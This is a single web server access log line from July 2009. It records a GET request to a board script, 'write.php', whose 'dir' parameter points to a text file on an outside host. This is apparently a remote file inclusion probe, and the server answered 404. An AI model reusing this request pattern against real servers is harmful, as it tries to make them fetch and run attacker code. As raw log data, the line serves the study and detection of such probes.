222.236.47.192 - - [12/Jul/2009:02:58:58 -0400] "GET /logs/access_log.Q109051300//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
